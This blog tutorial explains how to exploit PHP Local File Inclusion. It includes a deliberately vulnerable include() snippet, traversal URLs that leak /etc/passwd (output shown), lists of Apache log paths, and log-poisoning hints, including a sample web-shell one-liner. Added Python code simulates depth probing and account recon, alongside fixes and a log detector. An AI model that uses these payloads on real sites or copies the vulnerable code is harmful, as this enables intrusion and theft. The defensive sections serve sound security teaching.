Saturday, 05 May 2012

Exploiting Local File Inclusion (LFI) vulnerabilities

Local File Inclusion (LFI) means making a PHP page load a local file of the attacker's choosing, such as /etc/passwd or /etc/hosts, by controlling the path handed to a file-loading function. The bug is a programming mistake: a value taken from the request (GET, POST, cookie) is passed, unchecked, to one of these functions:

include
include_once
require
require_once
fopen

The first four execute whatever PHP code the target file contains, so including a file the attacker can write to (an upload, a log) turns file disclosure into code execution. fopen (like file_get_contents and readfile) only reads the file, so a user-controlled path there gives arbitrary file read, strictly path traversal rather than inclusion, but it is found the same way.



For example, suppose a page contains:

<?php
// The page name comes straight from the query string and goes into include().
// Nothing checks for "..", absolute paths or the extension, so the client
// decides which local file is loaded and, since it is include(), executed.
$vulnerable = $_GET['vulnerable'];
include($vulnerable); // could equally be require, require_once, fopen ...
?>

This code is vulnerable to Local File Inclusion.
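To make the defect concrete, here is an added example (my own Python model, not code from the post) that reproduces what include($vulnerable) ends up opening and places two hardened lookups beside it: an allowlist of page names, which is the fix to prefer, and a canonicalise-and-contain check for sites whose page set is dynamic. The directory names, the page list and the script location are assumptions.

```python
import posixpath

# Constructed example paths; the post does not say where the site lives on disk.
SCRIPT_DIR = "/var/www/vulnerable"            # directory of the hypothetical index.php
TEMPLATE_DIR = "/var/www/vulnerable/pages"    # the only place pages may be loaded from
ALLOWED_PAGES = {"home", "about", "contact"}  # names the application actually ships


def vulnerable_resolve(user_value: str) -> str:
    """What include($vulnerable) ends up opening: the raw GET value joined to
    the script directory, with every '..' honoured by the OS. An absolute
    value replaces the base entirely, which is why ?vulnerable=/etc/passwd
    works without any '../' at all."""
    return posixpath.normpath(posixpath.join(SCRIPT_DIR, user_value))


def safe_resolve_allowlist(user_value: str) -> str:
    """Preferred fix: the parameter names a page, never a path. Anything not
    in the allowlist is rejected before a filesystem path is even built."""
    if user_value not in ALLOWED_PAGES:
        raise ValueError(f"unknown page: {user_value!r}")
    return posixpath.join(TEMPLATE_DIR, user_value + ".php")


def safe_resolve_contained(user_value: str) -> str:
    """Fallback when the page set is dynamic: canonicalise, then prove the
    result is still inside TEMPLATE_DIR and carries the expected extension.
    (Real code should canonicalise with realpath() so symlinks are resolved
    as well; normpath is used here to keep the model offline.)"""
    if any(ord(c) < 0x20 for c in user_value):
        # PHP before 5.3.4 truncated paths at a NUL byte, so a value like
        # "home.php\0.jpg" passed extension checks and still opened home.php.
        raise ValueError("control character in page name")
    candidate = posixpath.normpath(posixpath.join(TEMPLATE_DIR, user_value))
    # commonpath, not startswith: "/var/www/vulnerable/pagesX/.." would pass
    # a naive prefix test but is not inside TEMPLATE_DIR.
    if posixpath.commonpath([TEMPLATE_DIR, candidate]) != TEMPLATE_DIR:
        raise ValueError(f"path escapes {TEMPLATE_DIR}: {candidate}")
    if not candidate.endswith(".php"):
        raise ValueError("only .php pages may be included")
    return candidate


if __name__ == "__main__":
    for value in ("home", "home.php", "../../../../etc/passwd", "/etc/passwd"):
        print(f"{value!r:28} vulnerable -> {vulnerable_resolve(value)}")
        for fix in (safe_resolve_allowlist, safe_resolve_contained):
            try:
                print(f"{'':28} {fix.__name__:24} -> {fix(value)}")
            except ValueError as err:
                print(f"{'':28} {fix.__name__:24} -> rejected ({err})")
```

The same two checks translate directly to PHP: compare the parameter against a fixed array of page names, or run realpath() on the joined path and verify that the result starts with the canonicalised template directory followed by a slash.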

Suppose our target URL is www.n00bprogammer.com/vulnerable/

If you request that URL directly in the browser you get a web page, which means there is an index file, here index.php, in that directory.

Now try the parameter with a relative path that climbs out of the web root:

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../etc/passwd (did not work: two levels up is not enough to reach / from where index.php lives)

www.n00bprogammer.com/vulnerable/index.php?vulnerable=../../../../etc/passwd

Each ../ moves one directory up from the script's directory, so you need at least as many as the web root is deep. Extra ones are harmless, because /.. resolves to /, which is why a long run of ../ is the usual first probe. With this code an absolute path, ?vulnerable=/etc/passwd, works too, since include() takes the value as given.

And it outputs:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
landscape:x:103:108::/var/lib/landscape:/bin/false
messagebus:x:104:112::/var/run/dbus:/bin/false
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
mysql:x:105:113::/var/lib/mysql:/bin/false
avahi:x:106:114::/var/run/avahi-daemon:/bin/false
snort:x:107:115:Snort IDS:/var/log/snort:/bin/false
statd:x:108:65534::/var/lib/nfs:/bin/false
haldaemon:x:109:117::/var/run/hald:/bin/false
kdm:x:110:65534::/home/kdm:/bin/false


That means it worked. Note that modern Unix-like systems no longer keep password hashes in /etc/passwd; they are in /etc/shadow, which is readable only by root (and the shadow group). PHP runs as the web server account, www-data in the listing above, so the same request aimed at /etc/shadow returns nothing.
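The probing above (two ../ fail, four succeed) and the /etc/shadow permission point can be rehearsed offline. The following is an added example, my own Python and not code from the post: it emulates include($_GET['vulnerable']) against a constructed in-memory filesystem with Unix owner/other permission bits, walks the ../ depth until the passwd signature appears, and then pulls the login-capable accounts out of the leaked file. The script directory, uids, file contents and the simplified permission model are assumptions.

```python
import posixpath
import re

# Constructed stand-in for the target's filesystem: path -> (owner uid, mode, content).
# uid 33 is www-data, the account PHP runs as on the Debian/Ubuntu box whose
# /etc/passwd the post shows. Contents are shortened and invented.
FAKE_FS = {
    "/etc/passwd": (0, 0o644,
                    "root:x:0:0:root:/root:/bin/bash\n"
                    "www-data:x:33:33:www-data:/var/www:/bin/sh\n"
                    "sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin\n"
                    "mysql:x:105:113::/var/lib/mysql:/bin/false\n"),
    "/etc/shadow": (0, 0o640, "root:$6$notarealsalt$notarealhash:15000:0:99999:7:::\n"),
    "/var/www/vulnerable/index.php": (33, 0o644, "<?php include($_GET['vulnerable']); ?>"),
}
SCRIPT_DIR = "/var/www/vulnerable"           # assumed location of index.php
PASSWD_SIGNATURE = re.compile(r"^root:[^:]*:0:0:", re.M)
NO_LOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}


def simulated_include(payload: str, uid: int = 33) -> str:
    """Behaves like include($_GET['vulnerable']) on FAKE_FS: '..' is resolved
    relative to the script directory, then the file is read with the web
    server's privileges. Returns '' when the file is missing or unreadable,
    which is what the browser shows when display_errors is off.
    (Permission model simplified to owner/other bits; no group check.)"""
    path = posixpath.normpath(posixpath.join(SCRIPT_DIR, payload))
    entry = FAKE_FS.get(path)
    if entry is None:
        return ""
    owner, mode, content = entry
    readable = uid == 0 or (owner == uid and mode & 0o400) or mode & 0o004
    return content if readable else ""


def find_traversal_depth(fetch, target="etc/passwd", max_depth=8):
    """Probe one '../' deeper each round until the response carries the
    passwd signature. Returns (depth, payload) or None. Any depth at or
    above the real one also works, because '/..' resolves to '/', so in
    practice a long run of '../' is sent first and trimmed afterwards."""
    for depth in range(1, max_depth + 1):
        payload = "../" * depth + target
        if PASSWD_SIGNATURE.search(fetch(payload)):
            return depth, payload
    return None


def login_accounts(passwd_text: str):
    """Recon on the leaked file: accounts with a real login shell are the
    ones worth a later password-guessing or key-reuse attempt."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and fields[6] not in NO_LOGIN_SHELLS:
            found.append((fields[0], int(fields[2]), fields[6]))
    return found


if __name__ == "__main__":
    print("two levels:", repr(simulated_include("../../etc/passwd")))
    print("probe:", find_traversal_depth(simulated_include))
    print("absolute:", simulated_include("/etc/passwd").splitlines()[0])
    print("shadow as www-data:", repr(simulated_include("../../../../etc/shadow")))
    print("shadow as root:", simulated_include("../../../../etc/shadow", uid=0).strip())
    print("login accounts:", login_accounts(simulated_include("/etc/passwd")))
```

Against a live target, fetch would be an HTTP GET of index.php?vulnerable=<payload> and the signature check would run on the response body; everything else stays the same.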

There are many other files worth reading, in particular the web server logs; the exact path depends on the distribution and on how Apache was built, so try several:

/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/access_log
 
 
Many sites pass a file name, extension included, in a URL parameter that has no business naming files: a php, image or asp file. Loading a file named by the client is not secure at all. For example:

www.target.site/vulnerable.php?=image.jpeg

A parameter like this may well be vulnerable to LFI too; test it the same way.

Experienced attackers go further, for example:

1. Turning the inclusion into code execution (hint: log poisoning, i.e. getting PHP code written into error_log or access_log, then including that log file). The code runs as the web server user, so "rooting" the box from there still needs a separate privilege escalation.
2. Reading more valuable files (hint: application config files that hold SQL credentials).

Try them, research and learn.
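From the defender's side, the log paths above and the poisoning hint describe exactly what shows up in a web server's access log during an LFI attack. The following is an added example, my own Python and not code from the post: it parses a handful of constructed Apache combined-format lines and tags requests carrying directory traversal, references to sensitive files or logs, and PHP tags in client-controlled fields (the tell-tale of someone seeding a log for later inclusion). The log lines, IP addresses and field layout are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format lines, not real traffic. The third request
# smuggles PHP into the User-Agent so it is written to access.log; the fourth
# then tries to include that log, which is the poisoning trick the hint alludes to.
SAMPLE_LOG = """\
203.0.113.5 - - [05/May/2012:10:01:02 +0000] "GET /vulnerable/index.php?vulnerable=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [05/May/2012:10:01:09 +0000] "GET /vulnerable/index.php?vulnerable=../../../../etc/passwd HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
203.0.113.5 - - [05/May/2012:10:01:15 +0000] "GET /vulnerable/index.php?vulnerable=..%2F..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1" 200 0 "-" "<?php system($_GET['c']); ?>"
203.0.113.5 - - [05/May/2012:10:01:20 +0000] "GET /vulnerable/index.php?vulnerable=../../../../var/log/apache2/access.log&c=id HTTP/1.1" 200 90210 "-" "Mozilla/5.0"
198.51.100.7 - - [05/May/2012:10:02:00 +0000] "GET /vulnerable/index.php?vulnerable=about HTTP/1.1" 200 498 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TRAVERSAL = re.compile(r"\.\.[/\\]")
SENSITIVE = re.compile(
    r"/etc/(passwd|shadow|hosts?)|/proc/self/|/var/log/|"
    r"(access|error)[._ ]?log|\.htpasswd", re.I)
PHP_TAG = re.compile(r"<\?(php\b|=)", re.I)


def classify(line: str):
    """Return (client ip, set of tags) for one log line, or None if it does
    not parse. The request target is percent-decoded twice because scanners
    often double-encode '../' to slip past naive filters."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    target = unquote(unquote(m["target"]))
    tags = set()
    if TRAVERSAL.search(target):
        tags.add("traversal")
    if SENSITIVE.search(target):
        tags.add("sensitive-path")
    # PHP tags in any client-controlled field that the server copies into its
    # logs mean someone is seeding a log file for later inclusion.
    if any(PHP_TAG.search(field) for field in (target, m["referer"], m["ua"])):
        tags.add("log-poisoning")
    return m["ip"], tags


def suspicious_requests(log_text: str):
    """Every parsed line that earned at least one tag, in log order."""
    hits = []
    for line in log_text.splitlines():
        parsed = classify(line)
        if parsed and parsed[1]:
            hits.append((parsed[0], sorted(parsed[1])))
    return hits


if __name__ == "__main__":
    for ip, tags in suspicious_requests(SAMPLE_LOG):
        print(ip, ", ".join(tags))
```

The traversal and sensitive-path tags on their own are noisy on a busy site; the combination of a log-poisoning tag followed shortly by a request that includes a log path from the same client is the sequence worth alerting on.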
 
Read more: http://en.wikipedia.org/wiki/Remote_file_inclusion 

Let me know if you have any questions.

1 comment:

  1. Why are you copying and pasting from my blog without any credit?
